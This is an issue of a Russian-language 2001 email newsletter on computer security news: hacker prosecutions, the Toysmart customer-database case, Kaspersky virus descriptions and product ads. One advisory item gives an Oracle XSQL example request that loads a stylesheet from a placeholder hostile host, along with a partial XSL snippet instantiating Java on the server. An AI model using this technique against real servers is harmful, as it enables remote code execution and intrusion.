Отправляет email-рассылки с помощью сервиса Sendsay

Inroad Hi - Tech Review

  Все выпуски  

Inroad Hi - Tech Review 11.01.2001


Служба Рассылок Subscribe.Ru проекта Citycat.Ru

Обзор высоких технологий в области  защиты и взлома

Новости:

Хакеру-ядерщику грозит 85 лет тюрьмы

Сотруднику лаборатории по ядерным исследованиям грозит 85 лет тюрьмы за взлом нескольких компьютерных сетей.

21-летний Джером Т. Хекенкамп (Jerome T. Heckenkamp), сотрудник Национальной Лаборатории в Лос-Аламос, предстанет перед судом за хакерские действия. Ему инкриминируется 7 случаев незаконного проникновения в компьютеры и 8 перехватов электронных сообщений, а также один случай взлома засекреченной базы данных. За все эти преступления Джерому грозит в общей сложности до 85 лет тюрьмы и $4 млн. штрафа.

Представители Национальной Лаборатории, являющейся самым крупным в США научным центром по разработке ядерного оружия, заявили, что Хекенкамп совершил все взломы до того, как был принят на работу, и данный случай не имеет никакого отношения к безопасности ядерных секретов Америки.

Согласно документам, представленным обвинением, Хекенкамп под никами "MagicFX" и "Magic" совершал взломы компьютерных сетей в период с 26 февраля по 29 ноября 1999 года. В то время он был студентом Университета штата Висконсин.

Copyright (C) CNews.ru

Онлайновый магазин Toysmart.com получит 50 тыс. дол. за уничтожение базы данных своих клиентов

[www.usatoday.com] По решению регулирующих органов компания Toysmart.com, которой раньше принадлежал одноименный онлайновый магазин, получит 50 тыс. дол. за то, что она уничтожит созданную за время работы магазина базу данных клиентов и не будет продавать ее, чтобы получить деньги для расплаты с кредиторами.

В базе данных содержатся имена, адреса, номера кредитных карточек и покупательские профили бывших клиентов бывшего онлайнового магазина. Когда магазин работал, то на сайте Toysmart.com потенциальным клиентам гарантировалось, что их персональная информация никогда не будет передана какой-либо третьей компании. Однако в мае прошлого года Toysmart.com, обанкротившись, решила прекратить свою деятельность и выйти из бизнеса. И после этого на страницах журнала Wall Street Journal появилось объявление с предложением о продаже базы данных клиентов.

Организации, выступающие за защиту частной информации в Internet, выразили бурный протест против таких действий Toysmart, они заявили, что если эта продажа будет разрешена, то следует ожидать целую волну аналогичных сделок. И все компании, закрывающие свои онлайновые магазины, сочтут, что они могут уже не выполнять ранее данных клиентам обещаний о неразглашении доверенных им сведений.

Федеральная комиссия по торговле и прокуроры 42 штатов, округа Колумбия, Виргинских и Северных Марианских островов подали в суд на Toysmart с требованием запретить компании продавать конфиденциальные сведения. Проблема была урегулирована без судебного разбирательства. Internet-подразделение компании Walt Disney, которой принадлежит 60% акций Toysmart, заплатит этой компании 50 тыс. дол., а за это Toysmart уничтожит свою базу данных. В принципе с этим предложением Disney обращалась к Toysmart еще в июле прошлого года, но последняя тогда отказалась от сделки, заявив, что предложенная цена за базу данных 250 тыс. клиентов слишком мала. По аналогичной причине Toysmart отвергла и предложение компании Digital Research купить упомянутую базу данных за 15'495 дол.

В конце июля Федеральная комиссия по торговле предложила разрешить Toysmart продать базу данных, но только той компании, которая примет на себя обязательства неразглашения этих сведений. Однако суд по делам банкротства отверг это предложение, решив подождать более денежных покупателей. Но таковых не нашлось. Теперь, некоторые сенаторы собираются выступить с инициативой внесения поправок в закон о банкротстве, предусматривающих защиту прав клиентов в подобных ситуациях.

Copyright (C) Россия-Он-Лайн

Охранник английской АЭС взломал компьютерную систему станции

Как сообщил во вторник новостной сайт ZDNet News со ссылкой на Guardian, на атомной станции в городе Брэдвелле, графство Эссекс, Великобритания, сотрудник охраны предпринял попытку саботажа компьютерной системы. Охранник взломал комьютерную сеть станции. Но при попытке удалить часть засекреченной информации, он привел в действие главную систему оповещения об опасности. По данным Guardian, незадачливый взломщик был обнаружен службой безопасности атомной станции. Сейчас ему предъявлено уголовное обвинение. Представители компании BNFL, которой принадлежит атомная станция в Брэдвелле, заявили, что никакой опасности для окружающей среды, персонала станции и проживающих рядом с ней граждан в результате инцидента не произошло. Станция работает в штатном режиме. Руководство атомной станции распорядилось усилить меры безопасности и ввести дополнительную защиту компьютерной системы.

Copyright (C) Netoscope.ru

За хакерство можно сесть навечно

Правительство Малайзии заявило, что не исключает возможности применения к хакерам, взламывающим правительственные сайты, пожизненного заключения, сообщает Ananova. Соответствующий закон был создан 40 лет назад для борьбы с диссидентами, теперь его могут применить к киберпреступникам. Подобные жесткие меры могут быть связаны с тем, что совсем недавно в Малайзии хакером, известным под кличкой Topeira был взломан сайт парламента. Данный инцидент, по мнению многих, подрывает доверие к использованию интернета в стране, а также отрицательно сказывается на репутации ее правительства. На данный момент взломано уже 50 из 700 существующих правительственных сайтов.

Copyright (C) СNews.ru

Израильский хакер Analyzer ответит за нападение на Пентагон

Суд восточного пригорода Тель-Авива Кфар Сава 13 марта должен вынести приговор 21- летнему гражданину Израиля Эхуду Тенебауму, известному в хакерском мире под именем Analyzer. Он признал, что в феврале 1998 года организовал успешную атаку на компьютеры министерства обороны США.

Инцидент совпал по времени с очередным усилением напряженности в районе Персидского залива, поэтому руководство Пентагона было уверено, что имеет дело с попытками Ирака помешать развертыванию американских сил на Среднем Востоке. Для борьбы с хакерами потребовались срочные усилия ФБР, ЦРУ, агентства национальной безопасности, специальных исследовательских подразделений ВВС США, НАСА, минюста и агентства защиты информационных систем, которые провели специальную операцию под кодовым названием Solar Sunrise.

В ходе операции выяснилось, что хакеры использовали хорошо известную (но проигнорированную специалистами министерства обороны) ошибку в операционной системе Solaris. Обнаружилась также полная невиновность Саддама Хусейна: нападавшими оказались двое калифорнийских подростков, вдохновленных на "подвиги" Тенебаумом. Недаром Analyzer пользовался в интернет-андеграунде репутацией авторитетного учителя начинающих хакеров.

Американские юноши получили условный срок. Признавший свою вину Тенебаум надеется на такой же приговор, однако обвинение намерено добиваться для него не менее чем полугодового тюремного заключения - в этом случае законы Израиля не разрешают отбывать срок под домашним арестом.

Генеральный прокурор США выразил удовлетворение ходом судебного разбирательства и заявил в этой связи, что процесс должен служить предостережением всем тем, кто вздумает незаконно проникнуть а американские вычислительные сети.

По результатам операции Solar Sunrise ФБР выпустило 18-минутный учебный фильм, который предлагает приобрести всем желающим по цене 12 долларов 28 центов.

Copyright (C) Lenta.ru

Oracle 8.1.7 позволяет несанкционированно исполнять удалённые сервлеты.
/HackZone.Ru/RSN Forum 10.01.2001 13:18:51/:

Oracle XSQL servlet позволяет несанкционированно исполнять удалённые сервлеты. Это происходит 1) из-за возможности указывать внешние таблицы стилей

http://XSQL-SERVER/EXISTING.xsql?xml-stylesheet=http://HOSTILE/ora.xsl

2) возможности вставлять в последние объекты java.

<xsl:xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.lang.String" version="1.0">
...
<xsl:variable name="str1" select="jstr:new('java on the server')" />
...

MindResourses 2001
/dl 10.01.2001 03:08:42/:

3-4 февраля в Москве пройдет demoparty MindResourses 2001. Оно обещает быть одним из крупнейших событий на российской демосцене за последние два года.
О своем участии уже заявили такие известные группы как Proxium, T-Rex, Hrg, Accept Core, Energy, WRC, Hbg.
Ожидаются и новые лица, приглашаются все желающие, гарантируются реальные призы и подарки.

Пользователи Сети обеспокоены безопасностью интернет-покупок

Обеспокоенность безопасностью и недоверие к службе работы с покупателями по-прежнему остаются главными причинами, удерживающими часть потенциальных покупателей от того, чтобы регулярно делать покупки в Сети, считает NFO Interactive. Согласно исследованию "2000 Online Retail Monitor", 72% пользователей, заявивших о своем нежелании делать покупки в интернете, сообщили о том, что они обеспокоены безопасностью таких покупок. "Большинство опрошенных полагают, что уровень безопасности в Сети значительно ниже, чем в обычных магазинах", - прокомментировала результаты исследования вице-президент NFO Interactive Анн Грин (Ann Green).

Copyright (C) РИА "РосБизнесКонсалтинг"

Logen.1028 работает по воскресеньям

Опасный нерезидентный вирус. При запуске ищет .EXE-файлы в текущем каталоге и записывается в их конец. По воскресеньям выводит текстовые сообщения и стирает сектора на жестком диске. Вирус содержит строки: Nihilism [Part I - Nevermind] Wanna have some fun with me, cutie? [Y|N]: $ FUCK YOU! USE YOUR FINGERS WHILE YAR HDD IS BEING FORMATTED! :))) See ya soon!$ I see...You are too dumb to play with me... So then just...FUUUUCCCCKKKK OFFFFFFFFF!$Coded by [LoGen]

Copyright (C) "Лаборатория Касперского"

Marker "отметился" в новом году

Семейство макро-вирусов Marker пополнилось в новом году сразу тремя новыми модификациями: Marker-GB, Marker-GA, Marker-CK. Все они были замечены в "диком виде". Marker-GB ведет log-файл своих инфекций. Он может сохранять этот файл в C:\hsf*.sys, где * - число. Этот вариант вируса также создает и запускает файл C:\netldx.vxd, который содержит команды посылать по протоколу FTP созданный им log-файл. Marker-GA создан путем объединения двух в общем безобидных макро-вирусов для Word: Marker-O и Myna-C (этот вирус подобно другим вариантам из семейства Myna не выполняет каких-либо деструктивных действий. Код вируса содержит строку "MYNAMEISVIRUS", которую сам вирус использует как признак своего присутствия в документе). Marker-O с вероятностью 1 из 3-х при закрытии документа устанавливает имя автора "Ethan Frome". Marker-CK также не отличается оригинальностью. С шансом 1 из 3-х при закрытии документа вирус меняет имя его автора на "Ethan Frome".

Copyright (C) "Лаборатория Касперского"

HLLP.Feci - очень опасный нерезидентный вирус

Вирус ищет .EXE-файлы и записывается в их начало. Первоначальное содержимое файлов шифрует и сдвигает вниз. Если при заражении происходит ошибка, вирус выводит стандартное сообщение DOS об ошибке: General failure reading drive Abort, Retry, Ignore, Fail? В зависимости от текущей даты (апрель 10,11,12, декабрь 28,29,30,31) вирус стирает информацию на диске и выводит текст: ЛДПР - НАШ ЛИДЕР!!! === Feci Quod Potui, Faciant Meliora Potentes

Copyright (C) "Лаборатория Касперского"

Обновлен сервер "Проекта - Alliance.com.ua"

Открыт новый раздел "Спутниковые телефоны"

ОБЗОР СПУТНИКОВЫХ ТЕЛЕФОНОВ:

Ericsson R290

СТАНДАРТ: Globalstar/GSM 900.

ПРОДОЛЖИТЕЛЬНОСТЬ РАБОТЫ: (в режиме разговора/ожидания): со стандартной аккумуляторной батареей для GSM 900 - 5/75 часов; со стандартной аккумуляторной батареей для Globalstar -1,5/6 часов... {Подробнее}

Открыт новый раздел "Ноутбуки"

ОБЗОР НОУТБУКОВ "ACER"

TravelMate 520

ФУНКЦИИ:

Невероятная производительность
TravelMate серии 520 построен с учетом самых современных мобильных технологий, обеспечивая пользователя превосходным инструментом, для решения его задач. В офисе, в деловых поездках или дома, TravelMate 520 позволяет пользователю эффективно использовать рабочее время и быть на высоте.

Основанные на Intel Pentium III процессорах для мобильных систем c технологией SpeedStep, TravelMate 520 справятся с любыми современными приложениями. C большим, ярким XGA TFT дисплеем и видоеадаптером на шине AGP TravelMate 520 готов к первоклассным презентациям и является превосходным решением для прогрессивных пользователей.

Концепция Все-в-одном
TravelMate 520 построен по модульному принципу, и обеспечивает удобство применения как при стационарной работе, так и при использовании в "походных" условиях. Так как все необходимые накопители уже встроены в корпус ноутбука Вам не придется носить с собой массу дополнительных устройств и PC карт... {Подробнее}

Cпонсор: ""ОН-ЛАЙН ТЕСТЫ: ВЫСОКИЕ ТЕХНОЛОГИИ, ПСИХОЛОГИЯ, ЮМОР""

Весь архив рассылки на CityCat

Хостинг предоставлен компанией Colocall



Ведущий рассылки - Андрей Барановский
Программирование -    Кочурков Анатолий
www.inroad.kiev.ua  ,  www.alliance.com.ua


Neon Banner Network

http://subscribe.ru/
E-mail: ask@subscribe.ru
Поиск

В избранное